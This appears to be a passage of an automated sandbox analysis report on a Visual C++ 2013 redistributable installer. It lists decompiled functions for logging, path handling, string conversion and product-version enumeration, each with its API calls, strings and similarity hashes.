0x0128c27f
0x0128c285
0x0128c28a

APIs

WaitForSingleObject.KERNEL32(00000001,000000FF,?,?,0128C689,?,0128138B,00000000,?,012813BB,00000001), ref: 0128C1ED
GetLastError.KERNEL32(?,?,0128C689,?,0128138B,00000000,?,012813BB,00000001), ref: 0128C1F7
GetExitCodeThread.KERNEL32(00000001,00000000,?,?,0128C689,?,0128138B,00000000,?,012813BB,00000001), ref: 0128C239
GetLastError.KERNEL32(?,?,0128C689,?,0128138B,00000000,?,012813BB,00000001), ref: 0128C243

Strings

Failed to get cache thread exit code., xrefs: 0128C277
core.cpp, xrefs: 0128C221, 0128C26D
Failed to wait for cache thread to terminate., xrefs: 0128C22B

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: ErrorLast$CodeExitObjectSingleThreadWait
String ID: Failed to get cache thread exit code.$Failed to wait for cache thread to terminate.$core.cpp
API String ID: 3686190907-2546940223
Opcode ID: ea27f03871bd832c5df9a5bf4b54781533840d213e79cde682e8dc8afcafc141
Instruction ID: 18dc24a9c5b00d8333f01163969adf00bec23cf7bea198ecbd181290e7465075
Opcode Fuzzy Hash: ea27f03871bd832c5df9a5bf4b54781533840d213e79cde682e8dc8afcafc141
Instruction Fuzzy Hash: E211A97166120BFADB20AFE5DD0ABDD7A64EF00751F204128A604E51D5D775C7209B54

Uniqueness

Uniqueness Score: -1.00%

Function 01285EBF Relevance: 12.1, APIs: 1, Strings: 7, Instructions: 105
stringCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E01285EBF(intOrPtr* __ebx, void* __ecx, void* __edx, signed int _a4) {
				char _v8;
				char _v12;
				char _v16;
				signed int _v20;
				void* __edi;
				int _t51;
				char* _t54;
				intOrPtr* _t55;
				void* _t56;
				void* _t59;
				void* _t60;
				void* _t61;
				intOrPtr* _t65;

				_t59 = __edx;
				_t56 = __ecx;
				_t55 = __ebx;
				asm("sbb eax, eax");
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				_t61 = E012B1FE9(_t60, ( ~_a4 & 0x00000007) + 0x1c,  &_v16);
				if(_t61 >= 0) {
					_v20 = 0;
					if( *((intOrPtr*)(__ebx + 4)) > 0) {
						_a4 = 0;
						while(1) {
							_t65 =  *_t55 + _a4;
							_t12 = _t65 + 4; // 0xdc683c79
							_t61 = E012B201F(_t56, _t59, _v16,  *_t12,  &_v8);
							if(_t61 < 0) {
								break;
							}
							_t61 = E012B201F(_t56, _t59, _v8,  *_t65,  &_v12);
							if(_t61 < 0) {
								break;
							} else {
								_t61 = E012B65D3(_v8, 0);
								if(_t61 < 0) {
									_push(_v8);
									_push("Failed to create regid folder: %ls");
									goto L15;
								} else {
									_t17 = _t65 + 8; // 0xe9012be1
									_t51 = lstrlenA( *_t17);
									_t18 = _t65 + 8; // 0xe9012be1
									_t61 = E012B6182(_t56, _v12, 0x80,  *_t18, _t51, 0);
									if(_t61 < 0) {
										_push(_v12);
										_push("Failed to write tag xml to file: %ls");
										goto L15;
									} else {
										_v20 = _v20 + 1;
										_a4 = _a4 + 0xc;
										_t25 = _t55 + 4; // 0xc33b012b
										if(_v20 <  *_t25) {
											continue;
										} else {
										}
									}
								}
							}
							goto L16;
						}
						_push("Failed to allocate regid folder path.");
						_push(_t61);
						E012AFA86();
					}
				} else {
					_t54 = "per-machine";
					if(_a4 == 0) {
						_t54 = "per-user";
					}
					_push(_t54);
					_push("Failed to find local %hs appdata directory.");
					L15:
					_push(_t61);
					E012AFA86();
				}
				L16:
				if(_v12 != 0) {
					E012B01E8(_v12);
				}
				if(_v8 != 0) {
					E012B01E8(_v8);
				}
				if(_v16 != 0) {
					E012B01E8(_v16);
				}
				return _t61;
			}

0x01285ebf
0x01285ebf
0x01285ebf
0x01285ed2
0x01285edb
0x01285ede
0x01285ee1
0x01285ee9
0x01285eed
0x01285f09
0x01285f0f
0x01285f15
0x01285f18
0x01285f1a
0x01285f21
0x01285f2c
0x01285f30
0x00000000
0x00000000
0x01285f40
0x01285f44
0x00000000
0x01285f46
0x01285f50
0x01285f54
0x01285f98
0x01285f9b
0x00000000
0x01285f56
0x01285f58
0x01285f5b
0x01285f62
0x01285f72
0x01285f76
0x01285fa2
0x01285fa5
0x00000000
0x01285f78
0x01285f78
0x01285f7e
0x01285f82
0x01285f85
0x00000000
0x00000000
0x01285f87
0x01285f85
0x01285f76
0x01285f54
0x00000000
0x01285f44
0x01285f89
0x01285f8e
0x01285f8f
0x01285f95
0x01285eef
0x01285eef
0x01285ef7
0x01285ef9
0x01285ef9
0x01285efe
0x01285eff
0x01285faa
0x01285faa
0x01285fab
0x01285fb0
0x01285fb3
0x01285fb8
0x01285fbd
0x01285fbd
0x01285fc5
0x01285fca
0x01285fca
0x01285fd2
0x01285fd7
0x01285fd7
0x01285fe1

APIs

Part of subcall function 012B1FE9: SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,00000104,00000000,?,0129745F,-0000001C,00000000,00000000,?,?,01298DEB), ref: 012B200A

lstrlenA.KERNEL32(E9012BE1,00000000,012813BB,00000000,012813BB,01287081,01287081,?,DC683C79,012813BB,01287065,?,UninstallString,012813BB), ref: 01285F5B

Strings

Failed to find local %hs appdata directory., xrefs: 01285EFF
Failed to create regid folder: %ls, xrefs: 01285F9B
per-machine, xrefs: 01285EEF
per-user, xrefs: 01285EF9, 01285EFE
Failed to write tag xml to file: %ls, xrefs: 01285FA5
Failed to allocate regid folder path., xrefs: 01285F89
UninstallString, xrefs: 01285EC6

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: FolderPathlstrlen
String ID: Failed to allocate regid folder path.$Failed to create regid folder: %ls$Failed to find local %hs appdata directory.$Failed to write tag xml to file: %ls$UninstallString$per-machine$per-user
API String ID: 3664928333-3308940114
Opcode ID: 16e3c3dbe155d252ed936ce632175dfabe2643da1d444e4ee87c615fccc00ec2
Instruction ID: 15381b45ee53f3c6b4970760addaad459c0d91f43daec0c6cbbe4e04dac87f35
Opcode Fuzzy Hash: 16e3c3dbe155d252ed936ce632175dfabe2643da1d444e4ee87c615fccc00ec2
Instruction Fuzzy Hash: B431E432C6121AFBCF12AF94CC819EDBFB5EF64780F204055F604A7190D771DA50AB90

Uniqueness

Uniqueness Score: -1.00%

Function 01287EA3 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 133
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E01287EA3(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v88;
				char _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				intOrPtr _v108;
				signed int _v112;
				intOrPtr _v120;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t39;
				void* _t70;
				void* _t75;
				signed int _t76;
				signed int _t77;
				void* _t78;
				signed int _t79;

				_t75 = __edx;
				_t70 = __ecx;
				_t39 =  *0x12d40d0; // 0xaab4e29e
				_v8 = _t39 ^ _t79;
				_v120 = _a4;
				_v108 = _a8;
				_v92 = 0;
				E012A7E30( &_v88, 0, 0x4e);
				_v104 = 0;
				_v100 = 0;
				_t76 = 0;
				_v112 = 0;
				_v96 = 0;
				while(1) {
					_t77 = E012B414C(_v120, _v96,  &_v88);
					if(_t77 == 0x80070103) {
						break;
					}
					if(_t77 < 0) {
						_push("Failed to enum related products.");
						_push(_t77);
						E012AFA86();
						L22:
						if(_v92 != 0) {
							E012B01E8(_v92);
						}
						return E012A7EAA(_t77, 0, _v8 ^ _t79, _t75, _t76, _t77);
					}
					_t78 = E012B4461(_t70,  &_v88, 0, 2, L"VersionString",  &_v92);
					if(_t78 == 0x80070645 || _t78 == 0x80070648) {
						_t77 = E012B4461(_t70,  &_v88, 0, 4, L"VersionString",  &_v92);
						__eflags = _t77 - 0x80070645;
						if(_t77 == 0x80070645) {
							goto L15;
						}
						__eflags = _t77 - 0x80070648;
						if(_t77 == 0x80070648) {
							goto L15;
						}
						__eflags = _t77;
						if(_t77 < 0) {
							_push( &_v88);
							_push("Failed to get version for product in machine context: %ls");
							goto L20;
						}
						goto L10;
					} else {
						if(_t78 >= 0) {
							L10:
							_t77 = E012B5D5F(_t70, _t75, _v92, 0,  &_v104);
							__eflags = _t77;
							if(_t77 < 0) {
								_push( &_v88);
								E012AFA86(_t77, "Failed to convert version: %ls to DWORD64 for ProductCode: %ls", _v92);
								goto L22;
							}
							__eflags = _v112 - _v100;
							if(__eflags > 0) {
								L15:
								_v96 = _v96 + 1;
								continue;
							}
							if(__eflags < 0) {
								L14:
								E012B1171(_t70, _t75, _v108,  &_v88, 0);
								_t76 = _v104;
								_v112 = _v100;
								goto L15;
							}
							__eflags = _t76 - _v104;
							if(_t76 > _v104) {
								goto L15;
							}
							goto L14;
						}
						_push( &_v88);
						_push("Failed to get version for product in user unmanaged context: %ls");
						L20:
						_push(_t77);
						E012AFA86();
						goto L22;
					}
				}
				_t77 = 0;
				_t76 = _t76 | _v112;
				__eflags = _t76;
				if(_t76 == 0) {
					_t77 = 0x80070103;
				}
				goto L22;
			}

0x01287ea3
0x01287ea3
0x01287ea9
0x01287eb0
0x01287eb9
0x01287ec3
0x01287ecb
0x01287ece
0x01287ed6
0x01287ed9
0x01287edc
0x01287ede
0x01287ee1
0x01287ee4
0x01287ef3
0x01287efc
0x00000000
0x00000000
0x01287f04
0x01287fb9
0x01287fbe
0x01287fbf
0x01287ff1
0x01287ff4
0x01287ff9
0x01287ff9
0x0128800e
0x0128800e
0x01287f1f
0x01287f27
0x01287f58
0x01287f5a
0x01287f60
0x00000000
0x00000000
0x01287f62
0x01287f68
0x00000000
0x00000000
0x01287f6a
0x01287f6c
0x01287fcb
0x01287fcc
0x00000000
0x01287fcc
0x00000000
0x01287f31
0x01287f33
0x01287f6e
0x01287f7b
0x01287f7d
0x01287f7f
0x01287fdf
0x01287fe9
0x00000000
0x01287fee
0x01287f84
0x01287f87
0x01287fa6
0x01287fa6
0x00000000
0x01287fa6
0x01287f89
0x01287f90
0x01287f98
0x01287fa0
0x01287fa3
0x00000000
0x01287fa3
0x01287f8b
0x01287f8e
0x00000000
0x00000000
0x00000000
0x01287f8e
0x01287f38
0x01287f39
0x01287fd1
0x01287fd1
0x01287fd2
0x00000000
0x01287fd7
0x01287f27
0x01287fae
0x01287fb0
0x01287fb0
0x01287fb3
0x01287fb5
0x01287fb5
0x00000000

APIs

_memset.LIBCMT ref: 01287ECE

Strings

VersionString, xrefs: 01287F0E, 01287F47
Failed to get version for product in user unmanaged context: %ls, xrefs: 01287F39
Failed to convert version: %ls to DWORD64 for ProductCode: %ls, xrefs: 01287FE3
Failed to enum related products., xrefs: 01287FB9
Failed to get version for product in machine context: %ls, xrefs: 01287FCC

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: _memset
String ID: Failed to convert version: %ls to DWORD64 for ProductCode: %ls$Failed to enum related products.$Failed to get version for product in machine context: %ls$Failed to get version for product in user unmanaged context: %ls$VersionString
API String ID: 2102423945-1979147598
Opcode ID: 456e9cb12d7d4690a2c496660c47e833576ad12adbfd408dc8502cf263a53456
Instruction ID: d87953b541a3c7841e932ef8ead64dc9637de64754ebac12c4158941dc989be7
Opcode Fuzzy Hash: 456e9cb12d7d4690a2c496660c47e833576ad12adbfd408dc8502cf263a53456
Instruction Fuzzy Hash: B4418E72D2125AAFDB10FEE9C8C1CEDFBB9EF14344F21402AEA09BB150D6355E548B91

Uniqueness

Uniqueness Score: -1.00%

Function 012B1E7E Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E012B1E7E(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, WCHAR** _a16) {
				struct _SECURITY_ATTRIBUTES* _v8;
				char _v12;
				void* __edi;
				intOrPtr* _t19;
				signed int _t31;
				signed int _t33;
				WCHAR** _t43;
				void* _t46;
				void* _t50;
				signed int _t52;
				void* _t54;
				void* _t55;

				_t44 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t19 = _a4;
				_push(_t46);
				_v8 = 0;
				_v12 = 0;
				if(_t19 == 0 ||  *_t19 == 0) {
					_t52 = E012B00D8( &_v8, 0x104);
					if(_t52 < 0) {
						goto L25;
					}
					if(GetTempPathW(0x104, _v8) != 0) {
						goto L4;
					}
					_t33 = GetLastError();
					if(_t33 > 0) {
						_t33 = _t33 & 0x0000ffff | 0x80070000;
					}
					_t52 = _t33;
					if(_t52 >= 0) {
						_t52 = 0x80004005;
					}
					E012B294E(_t33, "pathutil.cpp", 0x2cf, _t52);
				} else {
					_t52 = E012B1171(__ecx, __edx,  &_v8, _t19, 0);
					if(_t52 < 0) {
						L25:
						if(_v12 != 0) {
							E012B01E8(_v12);
						}
						if(_v8 != 0) {
							E012B01E8(_v8);
						}
						return _t52;
					}
					_t52 = E012B1E29(_t44, _t46,  &_v8);
					if(_t52 < 0) {
						goto L25;
					}
					L4:
					_t43 = _a16;
					_t50 = 1;
					if(_a12 < 1) {
						L23:
						if(_t52 >= 0) {
							_t52 = E012B1E29(_t44, _t50, _t43);
						}
						goto L25;
					} else {
						goto L5;
					}
					while(1) {
						L5:
						_t52 = E012B177A( &_v12, _a8, _t50);
						_t55 = _t54 + 0xc;
						if(_t52 < 0) {
							goto L25;
						}
						_push(_v12);
						_t52 = E012B177A(_t43, L"%s%s", _v8);
						_t54 = _t55 + 0x10;
						if(_t52 < 0) {
							goto L25;
						}
						_t52 = 0;
						if(CreateDirectoryW( *_t43, 0) != 0) {
							goto L23;
						}
						_t31 = GetLastError();
						if(_t31 != 0xb7) {
							if(_t31 != 3) {
								if(_t31 > 0) {
									_t31 = _t31 & 0x0000ffff | 0x80070000;
								}
							} else {
								_t31 = E012B65D3( *_t43, 0);
							}
							_t52 = _t31;
							goto L23;
						}
						_t50 = _t50 + 1;
						_t52 = 0x800700b7;
						if(_t50 <= _a12) {
							continue;
						} else {
							goto L25;
						}
					}
				}
			}

0x012b1e7e
0x012b1e81
0x012b1e82
0x012b1e83
0x012b1e8a
0x012b1e8b
0x012b1e8e
0x012b1e93
0x012b1f50
0x012b1f54
0x00000000
0x00000000
0x012b1f62
0x00000000
0x00000000
0x012b1f68
0x012b1f70
0x012b1f77
0x012b1f77
0x012b1f7c
0x012b1f80
0x012b1f82
0x012b1f82
0x012b1f92
0x012b1ea2
0x012b1ead
0x012b1eb1
0x012b1fc4
0x012b1fc8
0x012b1fcd
0x012b1fcd
0x012b1fd6
0x012b1fdb
0x012b1fdb
0x012b1fe6
0x012b1fe6
0x012b1ec0
0x012b1ec4
0x00000000
0x00000000
0x012b1eca
0x012b1eca
0x012b1ecf
0x012b1ed3
0x012b1fb8
0x012b1fba
0x012b1fc2
0x012b1fc2
0x00000000
0x00000000
0x00000000
0x00000000
0x012b1ed9
0x012b1ed9
0x012b1ee6
0x012b1ee8
0x012b1eed
0x00000000
0x00000000
0x012b1ef3
0x012b1f04
0x012b1f06
0x012b1f0b
0x00000000
0x00000000
0x012b1f11
0x012b1f1e
0x00000000
0x00000000
0x012b1f24
0x012b1f2f
0x012b1f9c
0x012b1faa
0x012b1fb1
0x012b1fb1
0x012b1f9e
0x012b1fa1
0x012b1fa1
0x012b1fb6
0x00000000
0x012b1fb6
0x012b1f31
0x012b1f32
0x012b1f3a
0x00000000
0x012b1f3c
0x00000000
0x012b1f3c
0x012b1f3a
0x012b1ed9

APIs

CreateDirectoryW.KERNEL32(01282142,00000000,?,?,?,?,01281E8E,01282222), ref: 012B1F16
GetLastError.KERNEL32(?,?,?,?,01281E8E,01282222), ref: 012B1F24
GetTempPathW.KERNEL32(00000104,00000000,00000000,00000104,00000000,00000000,01281E22,?,?,?,0128B78A,00000000,.ba%d,000F423F,01281E8E,01282222), ref: 012B1F5A
GetLastError.KERNEL32(?,?,?,0128B78A,00000000,.ba%d,000F423F,01281E8E,01282222,00000000,01281D56,?,?,0128D91E,2BAB1868,01281E22), ref: 012B1F68

Strings

pathutil.cpp, xrefs: 012B1F8D
%s%s, xrefs: 012B1EF9

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryPathTemp
String ID: %s%s$pathutil.cpp
API String ID: 2804724334-3961969462
Opcode ID: bbb17c84da4d61ad241a9d7a52888aeababfc1d5bcc0db52dfe09bca948e43af
Instruction ID: 8f46fccd2fa1c81cb6a7c993bb5f89ca294c3248d14a288742a9cba696fa447c
Opcode Fuzzy Hash: bbb17c84da4d61ad241a9d7a52888aeababfc1d5bcc0db52dfe09bca948e43af
Instruction Fuzzy Hash: 7D31A832D20327BBDF219AA8ECD4AEEBAA89F243E0F150565EA01E7150D3758D60D791

Uniqueness

Uniqueness Score: -1.00%

Function 012B076E Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 120
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 55%

			E012B076E(char** _a4, short* _a8, int _a12, int _a16) {
				int _v8;
				int _v12;
				intOrPtr _v16;
				int _t34;
				int _t36;
				int _t37;
				signed int _t41;
				char* _t44;
				char* _t45;
				int _t48;
				int _t52;
				int _t54;
				char** _t56;

				_t56 = _a4;
				_t33 =  *_t56;
				_t54 = _a12;
				_v8 = 0;
				_v12 = 0;
				_v16 = _t54;
				if( *_t56 == 0) {
					L3:
					if(_t54 != 0) {
						_t34 = _a12;
						if(0 == _a8[_t34]) {
							goto L11;
						}
						goto L12;
					} else {
						_t34 = WideCharToMultiByte(_a16, 0, _a8, 0xffffffff, 0, 0, 0, 0);
						if(_t34 != 0) {
							L11:
							_v16 = _t34 - 1;
							L12:
							_t36 = _v16 + 1;
							if(_v12 >= _t36) {
								L21:
								_t37 = _a12;
								if(_t37 == 0) {
									_t37 = _t37 | 0xffffffff;
								}
								if(WideCharToMultiByte(_a16, 0, _a8, _t37,  *_t56, _v12, 0, 0) != 0) {
									 *((char*)(_v16 +  *_t56)) = 0;
								} else {
									_t41 = GetLastError();
									if(_t41 > 0) {
										_t41 = _t41 & 0x0000ffff | 0x80070000;
									}
									_v8 = _t41;
									if(_t41 >= 0) {
										_v8 = 0x80004005;
									}
									_push(_v8);
									_push(0x181);
									goto L29;
								}
							} else {
								_t52 = _t36;
								_v12 = _t52;
								if(_t52 < 0x7fffffff) {
									_t44 =  *_t56;
									_push(1);
									_push(_t52);
									if(_t44 == 0) {
										_t45 = E012B233B();
									} else {
										_push(_t44);
										_t45 = E012B235D();
									}
									if(_t45 != 0) {
										 *_t56 = _t45;
										goto L21;
									} else {
										_t41 = 0x8007000e;
										_push(0x8007000e);
										_v8 = 0x8007000e;
										_push(0x17a);
										goto L29;
									}
								} else {
									_v8 = 0x8007000e;
								}
							}
						} else {
							_t41 = GetLastError();
							if(_t41 > 0) {
								_t41 = _t41 & 0x0000ffff | 0x80070000;
							}
							_v8 = _t41;
							if(_t41 >= 0) {
								_v8 = 0x80004005;
							}
							_push(_v8);
							_push(0x15f);
							L29:
							_push("strutil.cpp");
							E012B294E(_t41);
						}
					}
				} else {
					_t48 = E012B2382(_t33);
					_v12 = _t48;
					if(_t48 != 0xffffffff) {
						goto L3;
					} else {
						_v8 = 0x80070057;
					}
				}
				return _v8;
			}

0x012b0776
0x012b0779
0x012b077e
0x012b0781
0x012b0784
0x012b0787
0x012b078c
0x012b07a8
0x012b07b0
0x012b07f4
0x012b0800
0x00000000
0x00000000
0x00000000
0x012b07b2
0x012b07bf
0x012b07c3
0x012b0802
0x012b0803
0x012b0806
0x012b0809
0x012b080d
0x012b0854
0x012b0854
0x012b0859
0x012b085b
0x012b085b
0x012b0871
0x012b08ae
0x012b0873
0x012b0873
0x012b087b
0x012b0882
0x012b0882
0x012b0887
0x012b088c
0x012b088e
0x012b088e
0x012b0895
0x012b0898
0x00000000
0x012b0898
0x012b080f
0x012b080f
0x012b0811
0x012b081a
0x012b0828
0x012b082a
0x012b082c
0x012b082f
0x012b0839
0x012b0831
0x012b0831
0x012b0832
0x012b0832
0x012b0840
0x012b0852
0x00000000
0x012b0842
0x012b0842
0x012b0847
0x012b0848
0x012b084b
0x00000000
0x012b084b
0x012b081c
0x012b081c
0x012b081c
0x012b081a
0x012b07c5
0x012b07c5
0x012b07cd
0x012b07d4
0x012b07d4
0x012b07d9
0x012b07de
0x012b07e0
0x012b07e0
0x012b07e7
0x012b07ea
0x012b089d
0x012b089d
0x012b08a2
0x012b08a2
0x012b07c3
0x012b078e
0x012b078f
0x012b0794
0x012b079a
0x00000000
0x012b079c
0x012b079c
0x012b079c
0x012b079a
0x012b08b8

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,012AF2C8,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,012AF2C8,?,0128312E,00000000,0000FDE9), ref: 012B07BF
GetLastError.KERNEL32(?,0128312E,?,Failed to read data for message.,pipe.cpp,00000340,?,?,?,?,00000000), ref: 012B07C5

Part of subcall function 012B2382: GetProcessHeap.KERNEL32(00000000,?,?,012B08DD,?,?,00000000,?,?,?,?,012AF6D3,?,00000340,00000000,00000000), ref: 012B238A
Part of subcall function 012B2382: HeapSize.KERNEL32(00000000,?,012B08DD,?,?,00000000,?,?,?,?,012AF6D3,?,00000340,00000000,00000000,?), ref: 012B2391

Strings

W, xrefs: 012B079C
strutil.cpp, xrefs: 012B089D

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: Heap$ByteCharErrorLastMultiProcessSizeWide
String ID: W$strutil.cpp
API String ID: 3662877508-3697633219
Opcode ID: 55fbde46a50f1d7d16b0715cda038f9406a46d446a64876402216187b0c89a46
Instruction ID: 70c38d0505b9e722c08b0923a821e3a2c766358c737aac22e7805b891dfdfeec
Opcode Fuzzy Hash: 55fbde46a50f1d7d16b0715cda038f9406a46d446a64876402216187b0c89a46
Instruction Fuzzy Hash: F141A57192020AFFDF129F988CC49EE7BB9EF04394F204569F651EB180D6758B409B94

Uniqueness

Uniqueness Score: -1.00%

Function 012AF8AB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 118
fileCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E012AF8AB(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				char _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t21;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t35;
				signed int _t39;
				void* _t47;
				signed int _t49;

				_t47 = __edx;
				_t46 = __ecx;
				_push(__ecx);
				_v8 = 0;
				EnterCriticalSection(0x12d5d9c);
				_t21 = _a16;
				if(_t21 == 0 ||  *_t21 == 0) {
					_t49 = E012B201F(_t46, _t47, _a4, _a8, 0x12d5d94);
					if(_t49 < 0) {
						goto L22;
					}
					_t49 = E012B195B(0x12d5d9c,  *0x12d5d94,  &_v8);
					if(_t49 < 0) {
						goto L22;
					}
					_t49 = E012B65D3(_v8, 0);
					if(_t49 < 0) {
						goto L22;
					}
					_t31 = CreateFileW( *0x12d5d94, 0x40000000, 1, 0, (0 | _a20 != 0x00000000) + (0 | _a20 != 0x00000000) + 2, 0x80, 0);
					 *0x12d4ef0 = _t31;
					if(_t31 != 0xffffffff) {
						L12:
						if(_a20 != 0) {
							SetFilePointer( *0x12d4ef0, 0, 0, 2);
						}
						goto L14;
					}
					_t39 = GetLastError();
					if(_t39 > 0) {
						_t39 = _t39 & 0x0000ffff | 0x80070000;
					}
					_t49 = _t39;
					if(_t49 >= 0) {
						goto L12;
					} else {
						E012B294E(_t39, "logutil.cpp", 0x89, _t49);
						goto L22;
					}
				} else {
					_t49 = E012B2086(_t46, _t47, _a4, _a8, _a12, _t21, 0x12d5d94, 0x12d4ef0);
					if(_t49 < 0) {
						L22:
						LeaveCriticalSection(0x12d5d9c);
						if(_v8 != 0) {
							E012B01E8(_v8);
						}
						return _t49;
					} else {
						L14:
						if(_a24 != 0) {
							E012AF727(0x12d5d9c, _t47, _t49, 0);
						}
						_t32 =  *0x12d5d98; // 0x0
						if(_t32 != 0) {
							E012AF0FA(_t46, _t32);
							_t35 =  *0x12d5d98; // 0x0
							if(_t35 != 0) {
								E012B01E8(_t35);
								 *0x12d5d98 = 0;
							}
						}
						if(_a28 == 0) {
							L21:
							 *0x12d5d90 = 0;
							goto L22;
						} else {
							_t49 = E012B1171(_t46, _t47, _a28,  *0x12d5d94, 0);
							if(_t49 < 0) {
								goto L22;
							}
							goto L21;
						}
					}
				}
			}

0x012af8ab
0x012af8ab
0x012af8ae
0x012af8ba
0x012af8bd
0x012af8c3
0x012af8c8
0x012af907
0x012af90b
0x00000000
0x00000000
0x012af920
0x012af924
0x00000000
0x00000000
0x012af933
0x012af937
0x00000000
0x00000000
0x012af95e
0x012af964
0x012af96c
0x012af99a
0x012af99d
0x012af9a9
0x012af9a9
0x00000000
0x012af99d
0x012af96e
0x012af976
0x012af97d
0x012af97d
0x012af982
0x012af986
0x00000000
0x012af988
0x012af993
0x00000000
0x012af993
0x012af8cf
0x012af8e8
0x012af8ec
0x012af9fd
0x012af9fe
0x012afa07
0x012afa0c
0x012afa0c
0x012afa17
0x012af8f2
0x012af9af
0x012af9b2
0x012af9b4
0x012af9b4
0x012af9b9
0x012af9c0
0x012af9c3
0x012af9c8
0x012af9cf
0x012af9d2
0x012af9d7
0x012af9d7
0x012af9cf
0x012af9e0
0x012af9f7
0x012af9f7
0x00000000
0x012af9e2
0x012af9f1
0x012af9f5
0x00000000
0x00000000
0x00000000
0x012af9f5
0x012af9e0
0x012af8ec

APIs

EnterCriticalSection.KERNEL32(012D5D9C,00000001,00000000,00000001,?,?,01292083,00000001,?,00000000,?,00000000,00000000,0000000D,00000000,Setup), ref: 012AF8BD
CreateFileW.KERNEL32(40000000,00000001,00000000,?,00000080,00000000,?,00000000,?,?,00000000,012D5D94,?,?,01292083,00000001), ref: 012AF95E
GetLastError.KERNEL32(?,?,01292083,00000001,?,00000000,?,00000000,00000000,0000000D,00000000,Setup,00000000,log,0000000D,00000000), ref: 012AF96E
SetFilePointer.KERNEL32(00000000,00000000,00000002,?,?,01292083,00000001,?,00000000,?,00000000,00000000,0000000D,00000000,Setup,00000000), ref: 012AF9A9

Part of subcall function 012B2086: _memset.LIBCMT ref: 012B20D5
Part of subcall function 012B2086: GetLocalTime.KERNEL32(?,?,?,?,00000000,?), ref: 012B21C7

LeaveCriticalSection.KERNEL32(012D5D9C,?,00000000,012D5D94,?,?,01292083,00000001,?,00000000,?,00000000,00000000,0000000D,00000000,Setup), ref: 012AF9FE

Strings

logutil.cpp, xrefs: 012AF98E

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

